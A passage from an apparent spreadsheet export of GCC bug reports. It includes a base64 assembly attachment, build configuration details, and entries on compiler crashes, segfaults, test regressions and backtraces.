eAoJbW92endsCSglZXNpKSwgJWVicAoJbW92endsCSglZWF4LCVlc2kpLCAlZWN4CglzYWxsCSQx
NiwgJWVjeAoJb3JsCSVlY3gsICVlYnAKCWptcAkuTDI1OAouTDI2ODoKCXRlc3RsCSVlZHgsICVl
ZHgKCWNzIDsgamUJLkwyMzMKCW1vdmwJJWVkeCwgMTIoJWVzcCkKLkwyNDY6Cgltb3ZsCTM2KCVl
c3ApLCAlZWF4Cgl0ZXN0bAklZWF4LCAlZWF4CglqbGUJLkwyNjQKCW1vdmwJMzYoJWVzcCksICVl
YnAKLkwyNDU6Cgltb3ZsCTY4KCVlc3ApLCAlZWR4Cgl0ZXN0bAklZWR4LCAlZWR4CglqZQkuTDI0
MwoJbW92bAk2NCglZXNwKSwgJWVjeAoJbW92emJsCTEoJWVzaSksICVlYXgKCW1vdnpibAkoJWVz
aSksICVlZGkKCW1vdnpibAkxKCVlY3gsJWVzaSksICVlZHgKCXNhbGwJJDgsICVlYXgKCW1vdnpi
bAkoJWVjeCwlZXNpKSwgJWVjeAoJc2FsbAkkOCwgJWVkeAoJb3JsCSVlYXgsICVlZGkKCW9ybAkl
ZWR4LCAlZWN4CglzYWxsCSQxNiwgJWVjeAoJb3JsCSVlY3gsICVlZGkKLkwyNDQ6Cgltb3ZsCSVl
ZGksICVlYXgKCW1vdnN3bAklZGksJWVjeAoJbW92bAkxNiglZXNwKSwgJWVkeAoJc2FybAkkMTYs
ICVlYXgKCWFkZGwJNTYoJWVzcCksICVlc2kKCWFkZGwJJWVheCwgJWVjeAoJbW92bAklZWN4LCAl
ZWF4CglzaHJsCSQzMSwgJWVheAoJYWRkbAklZWF4LCAlZWN4CglzYXJsCSQxLCAlZWN4Cgltb3Z3
CSVjeCwgKCVlZHgpCglhZGRsCSQyLCAlZWR4CglzdWJsCSQxLCAlZWJwCgltb3ZsCSVlZHgsIDE2
KCVlc3ApCglqbmUJLkwyNDUKLkwyNjQ6CglhZGRsCTY0KCVlc3ApLCAlZXNpCglzdWJsCSQxLCAx
MiglZXNwKQoJam5lCS5MMjQ2CglqbXAJLkwyMzMKLkwyNDM6Cgltb3ZsCTY0KCVlc3ApLCAlZWRp
Cgltb3Z6d2wJKCVlZGksJWVzaSksICVlY3gKCW1vdnp3bAkoJWVzaSksICVlZGkKCXNhbGwJJDE2
LCAlZWN4CglvcmwJJWVjeCwgJWVkaQoJam1wCS5MMjQ0Ci5MZmU0OgoJLnNpemUJaGFsdmUxRGlt
YWdlX3Nob3J0LC5MZmU0LWhhbHZlMURpbWFnZV9zaG9ydAoJLnNlY3Rpb24JLnJvZGF0YS5jc3Q4
LCJhTSIsQHByb2diaXRzLDgKCS5hbGlnbiA4Ci5MQzI6CgkubG9uZwkwCgkubG9uZwkxMDcxNjQ0
NjcyCgkudGV4dAoJLmFsaWduIDIKCS50eXBlCWhhbHZlMURpbWFnZV91aW50LEBmdW5jdGlvbgpo
YWx2ZTFEaW1hZ2VfdWludDoKCXB1c2hsCSVlYnAKCXB1c2hsCSVlZGkKCXB1c2hsCSVlc2kKCXB1
c2hsCSVlYngKCXN1YmwJJDc2LCAlZXNwCgljYWxsCS5MUFIwCglhZGRsCSRfR0xPQkFMX09GRlNF
VF9UQUJMRV8sICVlYngKCW1vdmwJMTA0KCVlc3ApLCAlZWF4Cgltb3ZsCTEwMCglZXNwKSwgJWVj
eAoJbW92bAkxMTIoJWVzcCksICVlc2kKCW1vdmwJJWVheCwgJWVkeAoJc2hybAkkMSwgJWVjeAoJ
bW92bAkkMCwgMzIoJWVzcCkKCXNocmwJJDEsICVlZHgKCW1vdmwJJWVjeCwgMjAoJWVzcCkKCW1v
dmwJJDAsIDM2KCVlc3ApCgljbXBsCSQxLCAlZWF4Cgltb3ZsCTEyMCglZXNwKSwgJWVicAoJbW92
bAklZWR4LCA1MiglZXNwKQoJbW92bAkxMDgoJWVzcCksICVlY3gKCW1vdmwJJWVzaSwgNDgoJWVz
cCkKCWplCS5MMzQwCgljbXBsCSQxLCAxMDAoJWVzcCkKCWplCS5MMzQxCi5MMzA1OgoJYWRkbAkk
NzYsICVlc3AKCXBvcGwJJWVieAoJcG9wbAklZXNpCglwb3BsCSVlZGkKCXBvcGwJJWVicAoJcmV0
Ci5MMzQxOgoJbW92bAklZWJwLCAlZWR4Cgltb3ZsCTUyKCVlc3ApLCAlZWF4CglzdWJsCTEyNCgl
ZXNwKSwgJWVkeAoJdGVzdGwJJWVheCwgJWVheAoJbW92bAklZWR4LCA0KCVlc3ApCgljcyA7IGpl
CS5MMzA1Cgltb3ZsCTUyKCVlc3ApLCAlZWF4Cgltb3ZzZAkuTEMyQEdPVE9GRiglZWJ4KSwgJXht
bTMKCW1vdmwJJWVheCwgNDQoJWVzcCkKLkwzMzI6Cgltb3ZsCTk2KCVlc3ApLCAlZWF4Cgl0ZXN0
bAklZWF4LCAlZWF4CglqbGUJLkwzMzkKCWZuc3Rjdwk3MCglZXNwKQoJbW92YXBkCSV4bW0zLCAl
eG1tMgoJbW92bAk5NiglZXNwKSwgJWVzaQoJbW92endsCTcwKCVlc3ApLCAlZWF4Cgltb3ZiCSQx
MiwgJWFoCgltb3Z3CSVheCwgNjgoJWVzcCkKLkwzMzE6Cgltb3ZsCTEyOCglZXNwKSwgJWVheAoJ
dGVzdGwJJWVheCwgJWVheAoJamUJLkwzMjkKCW1vdnpibAkzKCVlY3gpLCAlZWRpCgltb3Z6YmwJ
MiglZWN4KSwgJWVkeAoJc2FsbAkkMTYsICVlZHgKCXNhbGwJJDI0LCAlZWRpCglvcmwJJWVkeCwg
JWVkaQoJbW92emJsCTEoJWVjeCksICVlZHgKCXNhbGwJJDgsICVlZHgKCW9ybAklZWR4LCAlZWRp
Cgltb3Z6YmwJKCVlY3gpLCAlZWR4CglvcmwJJWVkeCwgJWVkaQoJbW92bAklZWRpLCAzMiglZXNw
KQoJbW92emJsCTMoJWVicCwlZWN4KSwgJWVkaQoJbW92emJsCTIoJWVicCwlZWN4KSwgJWVkeAoJ
c2FsbAkkMTYsICVlZHgKCXNhbGwJJDI0LCAlZWRpCglvcmwJJWVkeCwgJWVkaQoJbW92emJsCTEo
JWVicCwlZWN4KSwgJWVkeAoJc2FsbAkkOCwgJWVkeAoJb3JsCSVlZHgsICVlZGkKCW1vdnpibAko
JWVicCwlZWN4KSwgJWVkeAoJb3JsCSVlZHgsICVlZGkKCW1vdmwJJWVkaSwgMzYoJWVzcCkKLkwz
MzA6Cgl4b3JsCSVlZGksICVlZGkKCW1vdmwJMzIoJWVzcCksICVlYXgKCXB1c2hsCSVlZGkKCXhv
cmwJJWVkaSwgJWVkaQoJcHVzaGwJJWVheAoJZmlsZGxsCSglZXNwKQoJYWRkbAkkOCwgJWVzcAoJ
ZnN0cGwJMjQoJWVzcCkKCW1vdmwJMzYoJWVzcCksICVlYXgKCW1vdnNkCTI0KCVlc3ApLCAleG1t
NQoJcHVzaGwJJWVkaQoJcHVzaGwJJWVheAoJZmlsZGxsCSglZXNwKQoJYWRkbAkkOCwgJWVzcAoJ
ZnN0cGwJMjQoJWVzcCkKCW1vdmwJNDgoJWVzcCksICVlZHgKCW1vdnNkCTI0KCVlc3ApLCAleG1t
NgoJYWRkc2QJJXhtbTYsICV4bW01CgltdWxzZAkleG1tMiwgJXhtbTUKCW1vdnNkCSV4bW01LCAy
NCglZXNwKQoJZmxkbAkyNCglZXNwKQoJZmxkY3cJNjgoJWVzcCkKCWZpc3RwbGwJNTYoJWVzcCkK
CWZsZGN3CTcwKCVlc3ApCgltb3ZsCTU2KCVlc3ApLCAlZWF4Cgltb3ZsCSVlYXgsICglZWR4KQoJ
YWRkbAkkNCwgJWVkeAoJYWRkbAkxMTYoJWVzcCksICVlY3gKCW1vdmwJJWVkeCwgNDgoJWVzcCkK
CXN1YmwJJDEsICVlc2kKCWpuZQkuTDMzMQouTDMzOToKCWFkZGwJNCglZXNwKSwgJWVjeAoJYWRk
bAklZWJwLCAlZWN4CglzdWJsCSQxLCA0NCglZXNwKQoJam5lCS5MMzMyCglqbXAJLkwzMDUKLkwz
Mjk6Cgltb3ZsCSglZWN4KSwgJWVkaQoJbW92bAkoJWVicCwlZWN4KSwgJWVheAoJbW92bAklZWRp
LCAzMiglZXNwKQoJbW92bAklZWF4LCAzNiglZXNwKQoJam1wCS5MMzMwCi5MMzQwOgoJbW92bAky
MCglZXNwKSwgJWVheAoJdGVzdGwJJWVheCwgJWVheAoJY3MgOyBqZQkuTDMwNQoJbW92bAkyMCgl
ZXNwKSwgJWVheAoJbW92c2QJLkxDMkBHT1RPRkYoJWVieCksICV4bW0zCgltb3ZsCSVlYXgsIDQ0
KCVlc3ApCi5MMzE4OgoJbW92bAk5NiglZXNwKSwgJWVheAoJdGVzdGwJJWVheCwgJWVheAoJamxl
CS5MMzM2CglmbnN0Y3cJNzAoJWVzcCkKCW1vdmFwZAkleG1tMywgJXhtbTIKCW1vdmwJOTYoJWVz
cCksICVlYnAKCW1vdnp3bAk3MCglZXNwKSwgJWVheAoJbW92YgkkMTIsICVhaAoJbW92dwklYXgs
IDY4KCVlc3ApCi5MMzE3OgoJbW92bAkxMjgoJWVzcCksICVlYXgKCXRlc3RsCSVlYXgsICVlYXgK
CWplCS5MMzE1Cgltb3Z6YmwJMyglZWN4KSwgJWVkeAoJbW92emJsCTIoJWVjeCksICVlZGkKCW1v
dnpibAkxKCVlY3gpLCAlZXNpCglzYWxsCSQxNiwgJWVkaQoJc2FsbAkkMjQsICVlZHgKCXNhbGwJ
JDgsICVlc2kKCW9ybAklZWRpLCAlZWR4Cgltb3ZsCTEyNCglZXNwKSwgJWVheAoJbW92emJsCSgl
ZWN4KSwgJWVkaQoJb3JsCSVlc2ksICVlZHgKCW1vdmwJJWVkeCwgJWVzaQoJbW92emJsCTMoJWVh
eCwlZWN4KSwgJWVkeAoJb3JsCSVlZGksICVlc2kKCXNhbGwJJDI0LCAlZWR4Cgltb3Z6YmwJMigl
ZWF4LCVlY3gpLCAlZWRpCglzYWxsCSQxNiwgJWVkaQoJbW92bAkxMjQoJWVzcCksICVlYXgKCW9y
bAklZWRpLCAlZWR4Cgltb3Z6YmwJMSglZWF4LCVlY3gpLCAlZWRpCgltb3ZsCTEyNCglZXNwKSwg
JWVheAoJc2FsbAkkOCwgJWVkaQoJbW92emJsCSglZWF4LCVlY3gpLCAlZWF4CglvcmwJJWVkaSwg
JWVkeAoJbW92bAklZWF4LCAlZWRpCglvcmwJJWVkeCwgJWVkaQouTDMxNjoKCW1vdmwJJWVzaSwg
JWVheAoJeG9ybAklZXNpLCAlZXNpCglwdXNobAklZXNpCgltb3ZsCSVlZGksICVlc2kKCXhvcmwJ
JWVkaSwgJWVkaQoJcHVzaGwJJWVheAoJZmlsZGxsCSglZXNwKQoJYWRkbAkkOCwgJWVzcAoJZnN0
cGwJMjQoJWVzcCkKCW1vdnNkCTI0KCVlc3ApLCAleG1tNAoJcHVzaGwJJWVkaQoJcHVzaGwJJWVz
aQoJZmlsZGxsCSglZXNwKQoJYWRkbAkkOCwgJWVzcAoJZnN0cGwJMjQoJWVzcCkKCW1vdmwJNDgo
JWVzcCksICVlYXgKCW1vdnNkCTI0KCVlc3ApLCAleG1tMQoJYWRkc2QJJXhtbTEsICV4bW00Cglt
dWxzZAkleG1tMiwgJXhtbTQKCW1vdnNkCSV4bW00LCAyNCglZXNwKQoJZmxkbAkyNCglZXNwKQoJ
ZmxkY3cJNjgoJWVzcCkKCWZpc3RwbGwJOCglZXNwKQoJZmxkY3cJNzAoJWVzcCkKCW1vdmwJOCgl
ZXNwKSwgJWVzaQoJbW92bAklZXNpLCAoJWVheCkKCWFkZGwJJDQsICVlYXgKCWFkZGwJMTE2KCVl
c3ApLCAlZWN4Cgltb3ZsCSVlYXgsIDQ4KCVlc3ApCglzdWJsCSQxLCAlZWJwCglqbmUJLkwzMTcK
LkwzMzY6CglhZGRsCTEyNCglZXNwKSwgJWVjeAoJc3VibAkkMSwgNDQoJWVzcCkKCWpuZQkuTDMx
OAoJam1wCS5MMzA1Ci5MMzE1OgoJbW92bAkxMjQoJWVzcCksICVlYXgKCW1vdmwJKCVlY3gpLCAl
ZXNpCgltb3ZsCSglZWF4LCVlY3gpLCAlZWRpCglqbXAJLkwzMTYKLkxmZTU6Cgkuc2l6ZQloYWx2
ZTFEaW1hZ2VfdWludCwuTGZlNS1oYWx2ZTFEaW1hZ2VfdWludAoJLnNlY3Rpb24JLnJvZGF0YS5j
c3Q4CgkuYWxpZ24gOAouTEM1OgoJLmxvbmcJMAoJLmxvbmcJMTA3MTY0NDY3MgoJLnRleHQKCS5h
bGlnbiAyCgkudHlwZQloYWx2ZTFEaW1hZ2VfaW50LEBmdW5jdGlvbgpoYWx2ZTFEaW1hZ2VfaW50
OgoJcHVzaGwJJWVicAoJcHVzaGwJJWVkaQoJcHVzaGwJJWVzaQoJcHVzaGwJJWVieAoJc3VibAkk
NDQsICVlc3AKCWNhbGwJLkxQUjAKCWFkZGwJJF9HTE9CQUxfT0ZGU0VUX1RBQkxFXywgJWVieAoJ
bW92bAk3MiglZXNwKSwgJWVheAoJbW92bAk2OCglZXNwKSwgJWVjeAoJbW92bAk4MCglZXNwKSwg
JWVzaQoJbW92bAklZWF4LCAlZWR4CglzaHJsCSQxLCAlZWN4Cgltb3ZsCSQwLCAxNiglZXNwKQoJ
c2hybAkkMSwgJWVkeAoJbW92bAklZWN4LCA4KCVlc3ApCgltb3ZsCSQwLCAyMCglZXNwKQoJY21w
bAkkMSwgJWVheAoJbW92bAk4OCglZXNwKSwgJWVicAoJbW92bAklZWR4LCAzNiglZXNwKQoJbW92
bAk3NiglZXNwKSwgJWVjeAoJbW92bAklZXNpLCAzMiglZXNwKQoJamUJLkw0MTIKCWNtcGwJJDEs
IDY4KCVlc3ApCglqZQkuTDQxMwouTDM3NzoKCWFkZGwJJDQ0LCAlZXNwCglwb3BsCSVlYngKCXBv
cGwJJWVzaQoJcG9wbAklZWRpCglwb3BsCSVlYnAKCXJldAouTDQxMzoKCW1vdmwJJWVicCwgJWVk
aQoJbW92bAkzNiglZXNwKSwgJWVheAoJc3VibAk5MiglZXNwKSwgJWVkaQoJdGVzdGwJJWVheCwg
JWVheAoJY3MgOyBqZQkuTDM3NwoJbW92bAkzNiglZXNwKSwgJWVheAoJbW92c2QJLkxDNUBHT1RP
RkYoJWVieCksICV4bW0zCgltb3ZsCSVlYXgsIDI4KCVlc3ApCi5MNDA0OgoJbW92bAk2NCglZXNw
KSwgJWVheAoJdGVzdGwJJWVheCwgJWVheAoJamxlCS5MNDExCgltb3ZhcGQJJXhtbTMsICV4bW0y
Cgltb3ZsCTY0KCVlc3ApLCAlZXNpCi5MNDAzOgoJbW92bAk5NiglZXNwKSwgJWVheAoJdGVzdGwJ
JWVheCwgJWVheAoJamUJLkw0MDEKCW1vdnpibAkzKCVlY3gpLCAlZWR4Cgltb3Z6YmwJMiglZWN4
KSwgJWVheAoJc2FsbAkkMTYsICVlYXgKCXNhbGwJJDI0LCAlZWR4CglvcmwJJWVheCwgJWVkeAoJ
bW92emJsCTEoJWVjeCksICVlYXgKCXNhbGwJJDgsICVlYXgKCW9ybAklZWF4LCAlZWR4Cgltb3Z6
YmwJKCVlY3gpLCAlZWF4CglvcmwJJWVheCwgJWVkeAoJbW92bAklZWR4LCAxNiglZXNwKQoJbW92
emJsCTMoJWVicCwlZWN4KSwgJWVkeAoJbW92emJsCTIoJWVicCwlZWN4KSwgJWVheAoJc2FsbAkk
MTYsICVlYXgKCXNhbGwJJDI0LCAlZWR4CglvcmwJJWVheCwgJWVkeAoJbW92emJsCTEoJWVicCwl
ZWN4KSwgJWVheAoJc2FsbAkkOCwgJWVheAoJb3JsCSVlYXgsICVlZHgKCW1vdnpibAkoJWVicCwl
ZWN4KSwgJWVheAoJb3JsCSVlYXgsICVlZHgKCW1vdmwJJWVkeCwgMjAoJWVzcCkKLkw0MDI6Cgl4
b3JsCSVlZHgsICVlZHgKCW1vdmwJMTYoJWVzcCksICVlYXgKCXB1c2hsCSVlZHgKCXhvcmwJJWVk
eCwgJWVkeAoJcHVzaGwJJWVheAoJZmlsZGxsCSglZXNwKQoJYWRkbAkkOCwgJWVzcAoJZnN0cHMJ
MTIoJWVzcCkKCW1vdmwJMjAoJWVzcCksICVlYXgKCW1vdnNzCTEyKCVlc3ApLCAleG1tNwoJcHVz
aGwJJWVkeAoJcHVzaGwJJWVheAoJZmlsZGxsCSglZXNwKQoJYWRkbAkkOCwgJWVzcAoJZnN0cHMJ
MTIoJWVzcCkKCW1vdmwJMzIoJWVzcCksICVlZHgKCW1vdnNzCTEyKCVlc3ApLCAleG1tNAoJYWRk
c3MJJXhtbTQsICV4bW03CgljdnRzczJzZAkleG1tNywgJXhtbTYKCW11bHNkCSV4bW0yLCAleG1t
NgoJY3Z0dHNkMnNpCSV4bW02LCAlZWF4Cgltb3ZsCSVlYXgsICglZWR4KQoJYWRkbAkkNCwgJWVk
eAoJYWRkbAk4NCglZXNwKSwgJWVjeAoJbW92bAklZWR4LCAzMiglZXNwKQoJc3VibAkkMSwgJWVz
aQoJam5lCS5MNDAzCi5MNDExOgoJYWRkbAklZWRpLCAlZWN4CglhZGRsCSVlYnAsICVlY3gKCXN1
YmwJJDEsIDI4KCVlc3ApCglqbmUJLkw0MDQKCWptcAkuTDM3NwouTDQwMToKCW1vdmwJKCVlY3gp
LCAlZWF4Cgltb3ZsCSVlYXgsIDE2KCVlc3ApCgltb3ZsCSglZWJwLCVlY3gpLCAlZWF4Cgltb3Zs
CSVlYXgsIDIwKCVlc3ApCglqbXAJLkw0MDIKLkw0MTI6Cgltb3ZsCTgoJWVzcCksICVlYXgKCXRl
c3RsCSVlYXgsICVlYXgKCWNzIDsgamUJLkwzNzcKCW1vdmwJOCglZXNwKSwgJWVheAoJbW92c2QJ
LkxDNUBHT1RPRkYoJWVieCksICV4bW0zCgltb3ZsCSVlYXgsIDI4KCVlc3ApCi5MMzkwOgoJbW92
bAk2NCglZXNwKSwgJWVheAoJdGVzdGwJJWVheCwgJWVheAoJamxlCS5MNDA4Cgltb3ZhcGQJJXht
bTMsICV4bW0yCgltb3ZsCTY0KCVlc3ApLCAlZWJwCi5MMzg5OgoJbW92bAk5NiglZXNwKSwgJWVh
eAoJdGVzdGwJJWVheCwgJWVheAoJamUJLkwzODcKCW1vdnpibAkzKCVlY3gpLCAlZWR4Cgltb3Z6
YmwJMiglZWN4KSwgJWVkaQoJbW92emJsCTEoJWVjeCksICVlc2kKCXNhbGwJJDE2LCAlZWRpCglz
YWxsCSQyNCwgJWVkeAoJc2FsbAkkOCwgJWVzaQoJb3JsCSVlZGksICVlZHgKCW1vdmwJOTIoJWVz
cCksICVlYXgKCW1vdnpibAkoJWVjeCksICVlZGkKCW9ybAklZXNpLCAlZWR4Cgltb3ZsCSVlZHgs
ICVlc2kKCW1vdnpibAkzKCVlYXgsJWVjeCksICVlZHgKCW9ybAklZWRpLCAlZXNpCglzYWxsCSQy
NCwgJWVkeAoJbW92emJsCTIoJWVheCwlZWN4KSwgJWVkaQoJc2FsbAkkMTYsICVlZGkKCW1vdmwJ
OTIoJWVzcCksICVlYXgKCW9ybAklZWRpLCAlZWR4Cgltb3Z6YmwJMSglZWF4LCVlY3gpLCAlZWRp
Cgltb3ZsCTkyKCVlc3ApLCAlZWF4CglzYWxsCSQ4LCAlZWRpCgltb3Z6YmwJKCVlYXgsJWVjeCks
ICVlYXgKCW9ybAklZWRpLCAlZWR4Cgltb3ZsCSVlYXgsICVlZGkKCW9ybAklZWR4LCAlZWRpCi5M
Mzg4OgoJbW92bAklZXNpLCAlZWF4Cgl4b3JsCSVlc2ksICVlc2kKCXB1c2hsCSVlc2kKCW1vdmwJ
JWVkaSwgJWVzaQoJeG9ybAklZWRpLCAlZWRpCglwdXNobAklZWF4CglmaWxkbGwJKCVlc3ApCglh
ZGRsCSQ4LCAlZXNwCglmc3RwcwkxMiglZXNwKQoJbW92c3MJMTIoJWVzcCksICV4bW01CglwdXNo
bAklZWRpCglwdXNobAklZXNpCglmaWxkbGwJKCVlc3ApCglhZGRsCSQ4LCAlZXNwCglmc3Rwcwkx
MiglZXNwKQoJbW92bAkzMiglZXNwKSwgJWVzaQoJbW92c3MJMTIoJWVzcCksICV4bW0xCglhZGRz
cwkleG1tMSwgJXhtbTUKCWN2dHNzMnNkCSV4bW01LCAleG1tNAoJbXVsc2QJJXhtbTIsICV4bW00
CgljdnR0c2Qyc2kJJXhtbTQsICVlZHgKCW1vdmwJJWVkeCwgKCVlc2kpCglhZGRsCSQ0LCAlZXNp
CglhZGRsCTg0KCVlc3ApLCAlZWN4Cgltb3ZsCSVlc2ksIDMyKCVlc3ApCglzdWJsCSQxLCAlZWJw
CglqbmUJLkwzODkKLkw0MDg6CglhZGRsCTkyKCVlc3ApLCAlZWN4CglzdWJsCSQxLCAyOCglZXNw
KQoJam5lCS5MMzkwCglqbXAJLkwzNzcKLkwzODc6Cgltb3ZsCTkyKCVlc3ApLCAlZWF4Cgltb3Zs
CSglZWN4KSwgJWVzaQoJbW92bAkoJWVheCwlZWN4KSwgJWVkaQoJam1wCS5MMzg4Ci5MZmU2OgoJ
LnNpemUJaGFsdmUxRGltYWdlX2ludCwuTGZlNi1oYWx2ZTFEaW1hZ2VfaW50Cg==
------=_NextPart_000_0008_01C227EC.1A3F0CE0--
Release:
3.1.1 20020708 (prerelease)
Environment:
System: Linux wespennest 2.4.18 #13 Sat Jul 6 13:32:45 CEST 2002 i686
unknown
Architecture: i686
host: i686-pc-linux-gnu
build: i686-pc-linux-gnu
target: i686-pc-linux-gnu
configured with:
../gcc/configure --prefix=/usr --program-suffix=-3.1 --with-gnu-ld --with-gn
u-as --disable-version-specific-runtime-libs --d
isable-shared --enable-threads --enable-libunwind-exceptions --enable-concep
t-checks --disable-symvers --with-gc=page --enable-cpp
Unformatted:
 This is a multi-part message in MIME format.
 ------=_NextPart_000_0008_01C227EC.1A3F0CE0
 Content-Type: text/plain
 	charset=iso-8859-1
 Content-Transfer-Encoding: 7bit</t>
  </si>
  <si>
    <t>leo.van.den.berg</t>
  </si>
  <si>
    <t>GCC-11682</t>
  </si>
  <si>
    <t>ICE in Templates default value call a function</t>
  </si>
  <si>
    <t>-- BELOW is very similar but not the same as bug #9436 --
#include 
int get_uuidof( std::type_info
template
struct TBoaz{
     T m_t 
     int m_i 
     TBoaz() : m_i( i ) {}
} 
struct ABoaz{
ABoaz(){}
}
int main(int argc char *argv[])
{
  TBoaz b 
  return 0
}
Invoked as:
c++ -O2 -O0 -g3 -Wall -fno-exceptions -fno-check-new -c main.cpp 
main.cpp:21: internal error: Segmentation fault 
Please submit a full bug report 
with preprocessed source if appropriate. 
it looks like the use of typeid in a default template parameter is somthing
not expected by GCC. 
free life
Boaz</t>
  </si>
  <si>
    <t>GCC-78958</t>
  </si>
  <si>
    <t>Unallocated memory access after SOURCE-ALLOCATEing unlimited polymorphic object</t>
  </si>
  <si>
    <t>spawn /test/gnu/gcc/objdir/gcc/testsuite/gfortran/../../gfortran -B/test/gnu/gcc
/objdir/gcc/testsuite/gfortran/../../ -B/test/gnu/gcc/objdir/hppa64-hp-hpux11.11
/./libgfortran/ /test/gnu/gcc/gcc/gcc/testsuite/gfortran.dg/alloc_comp_class_5.f
03 -fno-diagnostics-show-caret -fdiagnostics-color=never -O0 -pedantic-errors -B
/test/gnu/gcc/objdir/hppa64-hp-hpux11.11/./libgfortran/.libs -L/test/gnu/gcc/obj
dir/hppa64-hp-hpux11.11/./libgfortran/.libs -L/test/gnu/gcc/objdir/hppa64-hp-hpu
x11.11/./libgfortran/.libs -L/test/gnu/gcc/objdir/hppa64-hp-hpux11.11/./libatomic/.libs -B/test/gnu/gcc/objdir/hppa64-hp-hpux11.11/./libquadmath/.libs -L/test/gnu/gcc/objdir/hppa64-hp-hpux11.11/./libquadmath/.libs -L/test/gnu/gcc/objdir/hppa64-hp-hpux11.11/./libquadmath/.libs -lm -o ./alloc_comp_class_5.exePASS: gfortran.dg/alloc_comp_class_5.f03   -O0  (test for excess errors)Setting LD_LIBRARY_PATH to .:/test/gnu/gcc/objdir/hppa64-hp-hpux11.11/./libgfortran/.libs:/test/gnu/gcc/objdir/hppa64-hp-hpux11.11/./libgfortran/.libs:/test/gnu/gcc/objdir/hppa64-hp-hpux11.11/./libatomic/.libs:/test/gnu/gcc/objdir/hppa64-hp-hpux11.11/./libquadmath/.libs:/test/gnu/gcc/objdir/hppa64-hp-hpux11.11/./libquadmath/.libs:/test/gnu/gcc/objdir/gcc:.:/test/gnu/gcc/objdir/hppa64-hp-hpux11.11/./libgfortran/.libs:/test/gnu/gcc/objdir/hppa64-hp-hpux11.11/./libgfortran/.libs
:/test/gnu/gcc/objdir/hppa64-hp-hpux11.11/./libatomic/.libs:/test/gnu/gcc/objdir/hppa64-hp-hpux11.11/./libquadmath/.libs:/test/gnu/gcc/objdir/hppa64-hp-hpux11.11/./libquadmath/.libs:/test/gnu/gcc/objdir/gccspawn [open ...]Program received signal SIGSEGV: Segmentation fault - invalid memory reference.
(gdb) r
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /test/gnu/gcc/objdir/gcc/testsuite/gfortran/alloc_comp_class_5.exe 
Program received signal SIGSEGV Segmentation fault.
0x800003fffdd7d264 in ?? () from /lib/pa20_64/libc.2
(gdb) bt
#0  0x800003fffdd7d264 in ?? () from /lib/pa20_64/libc.2
#1  0x800003fffdd7ff38 in free () from /lib/pa20_64/libc.2
#2  0x4000000000006018 in array_list::add_item (
    a= 
    e=)
    at /test/gnu/gcc/gcc/gcc/testsuite/gfortran.dg/alloc_comp_class_5.f03:28
Breakpoint 2 0x800003fffdd7fc08 in free () from /lib/pa20_64/libc.2
(gdb) bt
#0  0x800003fffdd7fc08 in free () from /lib/pa20_64/libc.2
#1  0x4000000000006018 in array_list::add_item (
    a= 
    e=)
    at /test/gnu/gcc/gcc/gcc/testsuite/gfortran.dg/alloc_comp_class_5.f03:28
Backtrace stopped: previous frame identical to this frame (corrupt stack?)
(gdb) p/x $r26
$3 = 0x800000010000b280
It looks like this address wasn't allocated or previously freed.</t>
  </si>
  <si>
    <t>GCC-39579</t>
  </si>
  <si>
    <t>[4.5 regression] revisions 145171/145172 caused 2 extra failures</t>
  </si>
  <si>
    <t>As of revision 145224 on Linux/ia64 I saw
FAIL: gcc.dg/vect/vect-35.c scan-tree-dump-times vect vectorized 2 loops 1
FAIL: gfortran.dg/vect/fast-math-pr38968.f90 scan-tree-dump vect vectorized 1 loops
FAIL: libgomp.c++/collapse-2.C  -O3 -fomit-frame-pointer -funroll-all-loops -finline-functions  (internal compiler error)
FAIL: libgomp.c++/collapse-2.C  -O3 -fomit-frame-pointer -funroll-all-loops -finline-functions  (test for excess errors)
FAIL: libgomp.c++/collapse-2.C  -O3 -fomit-frame-pointer -funroll-loops  (internal compiler error)
FAIL: libgomp.c++/collapse-2.C  -O3 -fomit-frame-pointer -funroll-loops  (test for excess errors)</t>
  </si>
  <si>
    <t>GCC-80530</t>
  </si>
  <si>
    <t>[7/8 Regression][AArch64] ICE when expanding reciprocal square root with -mcpu=exynos-m1 or -mcpu=xgene-1</t>
  </si>
  <si>
    <t>This testcase:
double
bar (double a)
{
  return 1.0/__builtin_sqrt(a)
}
Fails with an ICE on AArch64 with the options:
 gcc -funsafe-math-optimizations -O1 foo.c -mcpu=xgene1
on Linux.
g.c: In function â€˜barâ€™:
g.c:11:14: internal compiler error: in expand_insn at optabs.c:7130
   return 1.0/__builtin_sqrt(a)
              ^~~~~~~~~~~~~~~~~
0xa70a15 expand_insn(insn_code unsigned int expand_operand*)
	.../gcc/optabs.c:7130
0x94589e expand_direct_optab_fn
	.../gcc/internal-fn.c:2600
0x71d4b7 expand_call_stmt
	.../gcc/cfgexpand.c:2569
0x71d4b7 expand_gimple_stmt_1
	.../gcc/cfgexpand.c:3571
0x71d4b7 expand_gimple_stmt
	.../gcc/cfgexpand.c:3737
0x71ee69 expand_gimple_basic_block
	.../gcc/cfgexpand.c:5744
0x7247d6 execute
	.../gcc/cfgexpand.c:6357
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug report.
See  for instructions.
The problem will be somewhere in the approximate square root expander as the same ICE does not occur for -mcpu values which do not use the approximate square root expansion path.</t>
  </si>
  <si>
    <t>GCC-12089</t>
  </si>
  <si>
    <t>m68k-coff-gcj segmentation fault on array initilisation</t>
  </si>
  <si>
    <t>When building libgcj for gcj m68k cross compiler the compiler segmentation 
faults on java.lang.Character.java 
== Host==
$ uname -a
CYGWIN_NT-5.1 RICHO 1.3.22(0.78/3/2) 2003-03-18 09:20 i686 unknown unknown 
Cygwin
== Program which causes errors==
public final class Character
{
    public static final String[] error = {
       0  1  2  3  4  5  6  7  8  9
      10 11 12 13 14
    }
}
== command line ==
/home/john/gnu/build/m68k-coff-test/gcc/gcc/gcj -v -da -Q -save-temps -
B/home/john/gnu/build/m68k-coff-test/gcc/gcc/ -B/home/john/H-i686-pc-
cygwin/m68k-coff-test/bin/ -B/home/john/H-i686-pc-cygwin/m68k-coff/lib/ -
isystem /home/john/H-i686-pc-cygwin/m68k-coff/include --encoding=UTF-8 -
fclasspath= -fbootclasspath=/home/john/gnu/build/m68k-coff-test/gcc/m68k-
coff/libjava -g -O0 -c Character.java -o Character.o
Reading specs from /home/john/gnu/build/m68k-coff-test/gcc/gcc/specs
Reading specs from libgcj.spec
rename spec lib to liborig
Configured with: /home/john/gnu/gcc-3.3/configure -v --prefix=/home/john/H-
i686-pc-cygwin --target=m68k-coff --enable-checking --enable-
languages=cc++java --disable-multilib --disable-java-net --with-newlib
Thread model: single
gcc version 3.3
